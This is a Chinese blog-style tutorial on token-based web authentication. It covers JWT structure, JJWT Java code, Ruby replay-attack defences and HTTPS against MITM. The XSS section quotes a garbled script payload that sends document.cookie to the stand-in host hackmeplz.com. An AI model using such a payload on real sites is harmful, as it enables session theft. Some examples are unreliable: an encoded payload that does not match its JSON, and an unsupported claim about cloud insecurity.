基于Token的WEB后臺認證機制
幾種常用的認證機制
HTTP Basic Auth
HTTP Basic Auth簡單點說明就是每次請求API時都提供用戶的username和password,簡言之,Basic Auth是配合RESTful API 使用的最簡單的認證方式,只需提供用戶名密碼即可,但由于有把用戶名密碼暴露給第三方客戶端的風險,在生產環境下被使用的越來越少。因此,在開發對外開放的RESTful API時,盡量避免采用HTTP Basic Auth
OAuth
OAuth(開放授權)是一個開放的授權標準,允許用戶讓第三方應用訪問該用戶在某一web服務上存儲的私密的資源(如照片,視頻,聯系人列表),而無需將用戶名和密碼提供給第三方應用。
OAuth允許用戶提供一個令牌,而不是用戶名和密碼來訪問他們存放在特定服務提供者的數據。每一個令牌授權一個特定的第三方系統(例如,視頻編輯網站)在特定的時段(例如,接下來的2小時內)內訪問特定的資源(例如僅僅是某一相冊中的視頻)。這樣,OAuth讓用戶可以授權第三方網站訪問他們存儲在另外服務提供者的某些特定信息,而非所有內容
下面是OAuth2.0的流程:
這種基于OAuth的認證機制適用于個人消費者類的互聯網產品,如社交類APP等應用,但是不太適合擁有自有認證權限管理的企業應用;
Cookie Auth
Cookie認證機制就是為一次請求認證在服務端創建一個Session對象,同時在客戶端的瀏覽器端創建了一個Cookie對象;通過客戶端帶上來Cookie對象來與服務器端的session對象匹配來實現狀態管理的。默認的,當我們關閉瀏覽器的時候,cookie會被刪除。但可以通過修改cookie 的expire time使cookie在一定時間內有效;
Token Auth
Token Auth的優點
Token機制相對于Cookie機制又有什么好處呢?
- 支持跨域訪問: Cookie是不允許垮域訪問的,這一點對Token機制是不存在的,前提是傳輸的用戶認證信息通過HTTP頭傳輸.
- 無狀態(也稱:服務端可擴展行):Token機制在服務端不需要存儲session信息,因為Token 自身包含了所有登錄用戶的信息,只需要在客戶端的cookie或本地介質存儲狀態信息.
- 更適用CDN: 可以通過內容分發網絡請求你服務端的所有資料(如:javascript,HTML,圖片等),而你的服務端只要提供API即可.
- 去耦: 不需要綁定到一個特定的身份驗證方案。Token可以在任何地方生成,只要在你的API被調用的時候,你可以進行Token生成調用即可.
- 更適用于移動應用: 當你的客戶端是一個原生平臺(iOS, Android,Windows 8等)時,Cookie是不被支持的(你需要通過Cookie容器進行處理),這時采用Token認證機制就會簡單得多。
- CSRF:因為不再依賴于Cookie,所以你就不需要考慮對CSRF(跨站請求偽造)的防范。
- 性能: 一次網絡往返時間(通過數據庫查詢session信息)總比做一次HMACSHA256計算 的Token驗證和解析要費時得多.
- 不需要為登錄頁面做特殊處理: 如果你使用Protractor 做功能測試的時候,不再需要為登錄頁面做特殊處理.
- 基于標準化:你的API可以采用標準化的 JSON Web Token (JWT). 這個標準已經存在多個后端庫(.NET, Ruby, Java,Python, PHP)和多家公司的支持(如:Firebase,Google, Microsoft).
基于JWT的Token認證機制實現
JSON Web Token(JWT)是一個非常輕巧的規范。這個規范允許我們使用JWT在用戶和服務器之間傳遞安全可靠的信息。其
JWT的組成
一個JWT實際上就是一個字符串,它由三部分組成,頭部、載荷與簽名。
載荷(Payload)
{ "iss": "Online JWT Builder",
"iat": 1416797419,
"exp": 1448333419,
"aud": "www.example.com",
"sub": "jrocket@example.com",
"GivenName": "Johnny",
"Surname": "Rocket",
"Email": "jrocket@example.com",
"Role": [ "Manager", "Project Administrator" ]
}
- iss: 該JWT的簽發者,是否使用是可選的;
- sub: 該JWT所面向的用戶,是否使用是可選的;
- aud: 接收該JWT的一方,是否使用是可選的;
- exp(expires): 什么時候過期,這里是一個Unix時間戳,是否使用是可選的;
- iat(issued at): 在什么時候簽發的(UNIX時間),是否使用是可選的;
其他還有: - nbf (Not Before):如果當前時間在nbf里的時間之前,則Token不被接受;一般都會留一些余地,比如幾分鐘;,是否使用是可選的;
將上面的JSON對象進行[base64編碼]可以得到下面的字符串。這個字符串我們將它稱作JWT的Payload(載荷)。
eyJpc3MiOiJKb2huIFd1IEpXVCIsImlhdCI6MTQ0MTU5MzUwMiwiZXhwIjoxNDQxNTk0NzIyLCJhdWQiOiJ3d3cuZXhhbXBsZS5jb20iLCJzdWIiOiJqcm9ja2V0QGV4YW1wbGUuY29tIiwiZnJvbV91c2VyIjoiQiIsInRhcmdldF91c2VyIjoiQSJ9
小知識:Base64是一種基于64個可打印字符來表示二進制數據的表示方法。由于2的6次方等于64,所以每6個比特為一個單元,對應某個可打印字符。三個字節有24個比特,對應于4個Base64單元,即3個字節需要用4個可打印字符來表示。JDK 中提供了非常方便的 BASE64Encoder 和 BASE64Decoder,用它們可以非常方便的完成基于 BASE64 的編碼和解碼
頭部(Header)
JWT還需要一個頭部,頭部用于描述關于該JWT的最基本的信息,例如其類型以及簽名所用的算法等。這也可以被表示成一個JSON對象。
{
"typ": "JWT",
"alg": "HS256"
}
在頭部指明了簽名算法是HS256算法。
當然頭部也要進行BASE64編碼,編碼后的字符串如下:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
簽名(Signature)
將上面的兩個編碼后的字符串都用句號.連接在一起(頭部在前),就形成了:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0
最后,我們將上面拼接完的字符串用HS256算法進行加密。在加密的時候,我們還需要提供一個密鑰(secret)。如果我們用mystar作為密鑰的話,那么就可以得到我們加密后的內容:
rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
最后將這一部分簽名也拼接在被簽名的字符串后面,我們就得到了完整的JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
在我們的請求URL中會帶上這串JWT字符串:
https://your.awesome-app.com/make-friend/?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM
認證過程
下面我們從一個實例來看如何運用JWT機制實現認證:
登錄
- 第一次認證:第一次登錄,用戶從瀏覽器輸入用戶名/密碼,提交后到服務器的登錄處理的Action層(Login Action);
- Login Action調用認證服務進行用戶名密碼認證,如果認證通過,Login Action層調用用戶信息服務獲取用戶信息(包括完整的用戶信息及對應權限信息);
- 返回用戶信息后,Login Action從配置文件中獲取Token簽名生成的秘鑰信息,進行Token的生成;
- 生成Token的過程中可以調用第三方的JWT Lib生成簽名后的JWT數據;
- 完成JWT數據簽名后,將其設置到COOKIE對象中,并重定向到首頁,完成登錄過程;
請求認證
基于Token的認證機制會在每一次請求中都帶上完成簽名的Token信息,這個Token信息可能在COOKIE
中,也可能在HTTP的Authorization頭中;
- 客戶端(APP客戶端或瀏覽器)通過GET或POST請求訪問資源(頁面或調用API);
- 認證服務作為一個Middleware HOOK 對請求進行攔截,首先在cookie中查找Token信息,如果沒有找到,則在HTTP Authorization Head中查找;
- 如果找到Token信息,則根據配置文件中的簽名加密秘鑰,調用JWT Lib對Token信息進行解密和解碼;
- 完成解碼并驗證簽名通過后,對Token中的exp、nbf、aud等信息進行驗證;
- 全部通過后,根據獲取的用戶的角色權限信息,進行對請求的資源的權限邏輯判斷;
- 如果權限邏輯判斷通過則通過Response對象返回;否則則返回HTTP 401;
對Token認證的五點認識
對Token認證機制有5點直接注意的地方:
- 一個Token就是一些信息的集合;
- 在Token中包含足夠多的信息,以便在后續請求中減少查詢數據庫的幾率;
- 服務端需要對cookie和HTTP Authrorization Header進行Token信息的檢查;
- 基于上一點,你可以用一套token認證代碼來面對瀏覽器類客戶端和非瀏覽器類客戶端;
- 因為token是被簽名的,所以我們可以認為一個可以解碼認證通過的token是由我們系統發放的,其中帶的信息是合法有效的;
JWT的JAVA實現
Java中對JWT的支持可以考慮使用JJWT開源庫;JJWT實現了JWT, JWS, JWE 和 JWA RFC規范;下面將簡單舉例說明其使用:
生成Token碼
import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
import java.security.Key;
import io.jsonwebtoken.*;
import java.util.Date;
//Sample method to construct a JWT
private String createJWT(String id, String issuer, String subject, long ttlMillis) {
//The JWT signature algorithm we will be using to sign the token
SignatureAlgorithm signatureAlgorithm = SignatureAlgorithm.HS256;
long nowMillis = System.currentTimeMillis();
Date now = new Date(nowMillis);
//We will sign our JWT with our ApiKey secret
byte[] apiKeySecretBytes = DatatypeConverter.parseBase64Binary(apiKey.getSecret());
Key signingKey = new SecretKeySpec(apiKeySecretBytes, signatureAlgorithm.getJcaName());
//Let's set the JWT Claims
JwtBuilder builder = Jwts.builder().setId(id)
.setIssuedAt(now)
.setSubject(subject)
.setIssuer(issuer)
.signWith(signatureAlgorithm, signingKey);
//if it has been specified, let's add the expiration
if (ttlMillis >= 0) {
long expMillis = nowMillis + ttlMillis;
Date exp = new Date(expMillis);
builder.setExpiration(exp);
}
//Builds the JWT and serializes it to a compact, URL-safe string
return builder.compact();
}
解碼和驗證Token碼
import javax.xml.bind.DatatypeConverter;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.Claims;
//Sample method to validate and read the JWT
private void parseJWT(String jwt) {
//This line will throw an exception if it is not a signed JWS (as expected)
Claims claims = Jwts.parser()
.setSigningKey(DatatypeConverter.parseBase64Binary(apiKey.getSecret()))
.parseClaimsJws(jwt).getBody();
System.out.println("ID: " + claims.getId());
System.out.println("Subject: " + claims.getSubject());
System.out.println("Issuer: " + claims.getIssuer());
System.out.println("Expiration: " + claims.getExpiration());
}
基于JWT的Token認證的安全問題
確保驗證過程的安全性
如何保證用戶名/密碼驗證過程的安全性;因為在驗證過程中,需要用戶輸入用戶名和密碼,在這一過程中,用戶名、密碼等敏感信息需要在網絡中傳輸。因此,在這個過程中建議采用HTTPS,通過SSL加密傳輸,以確保通道的安全性。
如何防范XSS Attacks
瀏覽器可以做很多事情,這也給瀏覽器端的安全帶來很多隱患,最常見的如:XSS攻擊:跨站腳本攻擊(Cross Site Scripting);如果有個頁面的輸入框中允許輸入任何信息,且沒有做防范措施,如果我們輸入下面這段代碼:
<img src="x" /> a.src='https://hackmeplz.com/yourCookies.png/?cookies=’
+document.cookie;return a}())"
這段代碼會盜取你域中的所有cookie信息,并發送到 hackmeplz.com;那么我們如何來防范這種攻擊呢?
- XSS攻擊代碼過濾
移除任何會導致瀏覽器做非預期執行的代碼,這個可以采用一些庫來實現(如:js下的js-xss,JAVA下的XSS HTMLFilter,PHP下的TWIG);如果你是將用戶提交的字符串存儲到數據庫的話(也針對SQL注入攻擊),你需要在前端和服務端分別做過濾; - 采用HTTP-Only Cookies
通過設置Cookie的參數: HttpOnly; Secure 來防止通過JavaScript 來訪問Cookie;
如何在Java中設置cookie是HttpOnly呢?
Servlet 2.5 API 不支持 cookie設置HttpOnly
http://docs.oracle.com/cd/E17802_01/products/products/servlet/2.5/docs/servlet-2_5-mr2/
建議升級Tomcat7.0,它已經實現了Servlet3.0
http://tomcat.apache.org/tomcat-7.0-doc/servletapi/javax/servlet/http/Cookie.html
或者通過這樣來設置:
//設置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//設置多個cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");
//設置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");
在實際使用中,我們可以使FireCookie查看我們設置的Cookie 是否是HttpOnly;
如何防范Replay Attacks
所謂重放攻擊就是攻擊者發送一個目的主機已接收過的包,來達到欺騙系統的目的,主要用于身份認證過程。比如在瀏覽器端通過用戶名/密碼驗證獲得簽名的Token被木馬竊取。即使用戶登出了系統,黑客還是可以利用竊取的Token模擬正常請求,而服務器端對此完全不知道,以為JWT機制是無狀態的。
針對這種情況,有幾種常用做法可以用作參考:
1、時間戳 +共享秘鑰
這種方案,客戶端和服務端都需要知道:
- User ID
- 共享秘鑰
客戶端
auth_header = JWT.encode({
user_id: 123,
iat: Time.now.to_i, # 指定token發布時間
exp: Time.now.to_i + 2 # 指定token過期時間為2秒后,2秒時間足夠一次HTTP請求,同時在一定程度確保上一次token過期,減少replay attack的概率;
}, "<my shared secret>")
RestClient.get("http://api.example.com/", authorization: auth_header)
服務端
class ApiController < ActionController::Base
attr_reader :current_user
before_action :set_current_user_from_jwt_token
def set_current_user_from_jwt_token
# Step 1:解碼JWT,并獲取User ID,這個時候不對Token簽名進行檢查
# the signature. Note JWT tokens are *not* encrypted, but signed.
payload = JWT.decode(request.authorization, nil, false)
# Step 2: 檢查該用戶是否存在于數據庫
@current_user = User.find(payload['user_id'])
# Step 3: 檢查Token簽名是否正確.
JWT.decode(request.authorization, current_user.api_secret)
# Step 4: 檢查 "iat" 和"exp" 以確保這個Token是在2秒內創建的.
now = Time.now.to_i
if payload['iat'] > now || payload['exp'] < now
# 如果過期則返回401
end
rescue JWT::DecodeError
# 返回 401
end
end
2、時間戳 +共享秘鑰+黑名單 (類似Zendesk的做法)
客戶端
auth_header = JWT.encode({
user_id: 123,
jti: rand(2 << 64).to_s, # 通過jti確保一個token只使用一次,防止replace attack
iat: Time.now.to_i, # 指定token發布時間.
exp: Time.now.to_i + 2 # 指定token過期時間為2秒后
}, "<my shared secret>")
RestClient.get("http://api.example.com/", authorization: auth_header)
服務端
def set_current_user_from_jwt_token
# 前面的步驟參考上面
payload = JWT.decode(request.authorization, nil, false)
@current_user = User.find(payload['user_id'])
JWT.decode(request.authorization, current_user.api_secret)
now = Time.now.to_i
if payload['iat'] > now || payload['exp'] < now
# 返回401
end
# 下面將檢查確保這個JWT之前沒有被使用過
# 使用Redis的原子操作
# The redis 的鍵: <user id>:<one-time use token>
key = "#{payload['user_id']}:#{payload['jti']}"
# 看鍵值是否在redis中已經存在. 如果不存在則返回nil. 如果存在則返回“1”. .
if redis.getset(key, "1")
# 返回401
#
end
# 進行鍵值過期檢查
redis.expireat(key, payload['exp'] + 2)
end
如何防范MITM (Man-In-The-Middle)Attacks
所謂MITM攻擊,就是在客戶端和服務器端的交互過程被監聽,比如像可以上網的咖啡館的WIFI被監聽或者被黑的代理服務器等;
針對這類攻擊的辦法使用HTTPS,包括針對分布式應用,在服務間傳輸像cookie這類敏感信息時也采用HTTPS;所以云計算在本質上是不安全的。
參考目錄:
https://stormpath.com/blog/build-secure-user-interfaces-using-jwts
https://auth0.com/blog/2014/01/27/ten-things-you-should-know-about-tokens-and-cookies/
https://www.quora.com/Is-JWT-JSON-Web-Token-insecure-by-design
https://github.com/auth0/node-jsonwebtoken/issues/36
http://christhorntonsf.com/secure-your-apis-with-jwt/
浙公網安備 33010602011771號